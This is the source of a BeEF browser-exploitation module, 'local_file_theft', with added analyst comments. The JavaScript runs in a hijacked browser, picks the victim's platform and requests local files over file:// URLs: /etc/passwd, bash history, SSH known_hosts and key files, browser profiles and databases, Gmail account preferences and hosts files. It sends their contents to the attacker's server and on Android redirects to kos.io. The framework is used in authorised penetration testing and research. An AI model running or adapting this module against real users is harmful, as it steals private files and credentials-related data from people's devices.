beef/modules/misc/local_file_theft/command.js


//
// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// local_file_theft
//
// Shamelessly plagiarised from kos.io/xsspwn
beef.execute(function() {
// Target table for the module.
// `result` and `fileList` are assigned without var/let/const, so (assuming no
// enclosing strict mode) they become properties of the global object.
// fileList starts as an array of five platform names and is then given
// string-keyed properties, one per platform, each holding:
//   discover - a file requested first (to learn a home directory or the running app)
//   post     - label -> path pairs requested afterwards by grabFiles()
// Analyst note: the paths below are the complete set of files this module asks
// for, so they double as a checklist of what a browsing context that still
// allows script access to local files would expose.
result = '';
fileList = ['linux','mac','ios','android','windows']
fileList['linux']= {
// How do we discover users?
"discover" :'/etc/passwd',
// Okay, we found them, what do we pillage?
// All five paths are relative; grabFiles() prefixes them with the home
// directory captured from /etc/passwd. 'sshKeys' names id_rsa.pub, i.e. the
// public key file.
"post" :{
'bashHistory':'.bash_history',
'sshHosts':'.ssh/known_hosts',
'sshKeys':'.ssh/id_rsa.pub',
'firefoxProfiles':'.mozilla/firefox/profiles.ini',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['mac']= {
// How do we discover users?
"discover" :'/Library/Preferences/com.apple.loginwindow.plist',
// Okay, we found them, what do we pillage?
// This list is identical to the linux one.
"post" :{
'bashHistory':'.bash_history',
'sshHosts':'.ssh/known_hosts',
'sshKeys':'.ssh/id_rsa.pub',
'firefoxProfiles':'.mozilla/firefox/profiles.ini',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['android']= {
// Instead of how, just figure out the currently in use app
"discover" :'/proc/self/status',
// Okay, we found them, what do we pillage?
// Absolute paths into per-app data directories (stock browser, Gmail,
// Dolphin). The last entry is a relative path, unlike the others.
"post" :{
'browser_data':'/data/data/com.android.browser/databases/webview.db',
'browser_data2':'/data/data/com.android.browser/databases/browser.db',
'gmail_accounts':'/data/data/com.google.android.gm/shared_prefs/Gmail.xml',
'dolpin_data':'/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db',
'dolpin_data2':'/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['ios']= {
// WHAT IS THIS I DON'T EVEN
// No discovery file: the empty string is still passed to XMLHttpRequest.open()
// by the ios handler in functionList.
"discover" :'',
"post" :{
'iPadEtcHosts':'/etc/hosts'
}
}
fileList['windows']= {
// Meh, who cares
// Data only: functionList has no 'windows' handler that would use this entry.
"discover" :'',
"post" :{
'bootini':'/c:/boot.ini',
'hosts':'/c:/WINDOWS/system32/drivers/etc/hosts'
}
}
fileList['custom']= {
// user defined
// The path is a template placeholder (ERB-style syntax), presumably filled in
// by the framework before the script is delivered.
// NOTE(review): the value lands inside a single-quoted JavaScript string;
// whether it is escaped for that context is not visible in this file.
"discover" :'',
"post" :{
'result':'<%== @target_file %>',
}
}
// Per-platform discovery handlers, keyed by the value identify() returns.
// Handlers exist for mac, linux, ios, custom and android only.
// Every handler follows the same shape: create an XMLHttpRequest in the
// undeclared (shared) variable `tmp`, open a GET, send it, attach
// onreadystatechange after send(), and return true immediately; the real work
// happens later in the callback, which ends by calling grabFiles().
// All reads are ordinary XMLHttpRequest GETs, so they succeed only where the
// browsing context is allowed to read the target URL.
// NOTE(review): current mainstream browsers refuse file:// reads from http(s)
// pages, and embedded WebViews can be configured to refuse them as well (for
// example Android's WebSettings.setAllowFileAccessFromFileURLs(false)) -
// confirm against the platform in use.
functionList = {
mac:{
// OS X discovery
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',"file:///"+fileList['mac']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
// TODO
// Understand plist format to _reliably_ pull out username with regex
//user = tmp.responseText.match(/\x03\x57(.*)\x12/)[1];
// Captures the text between byte 0x54 and the bytes 0x12 0x01. match()
// returns null when the pattern is absent, so the [1] index then throws a
// TypeError inside this callback and grabFiles() is never reached.
user = tmp.responseText.match(/\x54(.*)\x12\x01/)[1];
// No file:// scheme here: the prefix handed to grabFiles() is a bare path.
homedir = "/Users/"+user+"/";
grabFiles(homedir,"mac")
}
}
return true;
}
},
linux:{
// Linux username discovery
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',"file:///"+fileList['linux']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
// First passwd entry with an 'x' password field and exactly four-digit uid
// and gid fields; the capture group is the home-directory field. As above, a
// non-matching response makes the [1] index throw.
userDir = tmp.responseText.match(/[a-z0-9]*:x:[0-9]{4}:[0-9]{4}:[^:]*:([^:]*)/)[1];
// Bare path again, no scheme.
homedir = userDir+"/";
grabFiles(homedir,"linux")
}
}
return true;
}
},
ios:{
// Grab ipad stuff
discover : function(){
tmp = new XMLHttpRequest()
// fileList['ios']['discover'] is the empty string, and the response is not
// used. NOTE(review): an empty URL presumably resolves to the current
// document; the request appears to serve only as an asynchronous trigger.
tmp.open('get',fileList['ios']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
homedir = "file:///";
grabFiles(homedir,"ios")
}
}
return true;
}
},
custom:{
// Grab custom stuff
discover : function(){
tmp = new XMLHttpRequest()
// Same pattern as ios: empty discover URL, response ignored, and the
// operator-supplied path is requested under a "file:///" prefix.
tmp.open('get',fileList['custom']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
homedir = "file:///";
grabFiles(homedir,"custom")
}
}
return true;
}
},
android:{
// figure out what app (gmail, browser, or dolphin?) android
discover : function(){
//document.location="http://kos.io/"
tmp = new XMLHttpRequest()
// '/proc/self/status' is opened without a file:// prefix, so the URL is
// resolved against the page's own URL.
tmp.open('get',fileList['android']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
// The response is searched for three package-name fragments. On a match the
// page is navigated to a hard-coded third-party host (kos.io), which makes
// these URLs a network-visible side effect of this handler. grabFiles() is
// still called after the assignment.
if(/.*android\.gm.*/.test(tmp.responseText)){
document.location="http://kos.io/gmail"
} else if(/.*android\.browser.*/.test(tmp.responseText)){
document.location="http://kos.io/browser"
} else if(/.*ek\.TunnyBrowser.*/.test(tmp.responseText)){
document.location="http://kos.io/dolphin"
}
grabFiles("/","android")
}
}
return true;
}
}
}
// Pick the platform key used to index fileList and functionList.
// Returns "custom" whenever the rendered target-file value is anything other
// than the literal 'autodetect'. Otherwise it returns the first match from an
// ordered list of navigator.userAgent / navigator.platform tests, or undefined
// when nothing matches.
// Of the possible return values, "windows" and "webos" have no handler in
// functionList.
function identify(){
  // Operator named a specific file: skip platform detection entirely.
  if ('<%== @target_file %>' != 'autodetect') {
    return "custom";
  }
  // [navigator property, pattern, platform key]; first match wins, so the
  // order of the rows is significant.
  var rules = [
    ["userAgent", /.*Android.*/, "android"],
    ["platform", /Linux.*/i, "linux"],
    ["platform", /iP.*/i, "ios"],
    ["userAgent", /.*Mac.*/i, "mac"],
    ["userAgent", /.*Windows.*/i, "windows"],
    ["platform", /.*hpwOS.*/i, "webos"]
  ];
  for (var k = 0; k < rules.length; k++) {
    var rule = rules[k];
    if (rule[1].test(navigator[rule[0]])) {
      return rule[2];
    }
  }
}
// Invoke the discovery handler registered in functionList for `os` and return
// its result. Throws a TypeError when functionList has no entry for `os`.
function discoverUsers(os){
  var platform = functionList[os];
  return platform['discover']();
}
// Request every path in fileList[os]['post'] under the prefix `dir` and
// forward whatever comes back to the BeEF server.
//   dir - prefix string chosen by the discovery handler
//   os  - key into fileList
// `tmpfile`, `i` and `j` are assigned without declaration, so (assuming
// non-strict code) they are shared globals, not per-call or per-request locals.
function grabFiles(dir,os){
tmpfile = {}
for (i in fileList[os]['post']){
beef.debug('dir = ' + dir);
beef.debug('fileList: ' + fileList[os]['post'][i]);
beef.debug(i);
tmpfile[i] = new XMLHttpRequest()
// Plain concatenation: a `dir` that already ends in "/" yields a doubled
// slash. Only the ios and custom handlers pass a file:// scheme; for the
// other platforms the URL has no scheme, so the browser resolves it against
// the page's own URL.
tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
tmpfile[i].send();
// Every request gets the same handler body. It cannot tell which request
// fired, so it rescans all labels on each state change.
tmpfile[i].onreadystatechange=function(){
for (j in fileList[os]['post']){
// readyState 4 is the only condition; status is not checked, so a refused or
// failed read is reported with whatever responseText holds.
if(tmpfile[j].readyState==4){
beef.debug('new returned for: ' + j);
result = j +": "+ tmpfile[j].responseText;
// Because of the rescan, a file that has already completed is sent again on
// every later state change of any other request, so the server can receive
// the same label more than once.
// The command URL and id are template placeholders; the id is unquoted, so
// this file only parses as JavaScript after rendering.
// NOTE(review): file content is appended to 'result=' without encoding here;
// whether beef.net.send encodes it is not visible in this file.
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
}
}
}
}
}
// Entry point: choose the platform key, then start that platform's discovery
// request. Nothing is returned to the caller; results arrive later through
// the XMLHttpRequest callbacks.
discoverUsers(identify());
});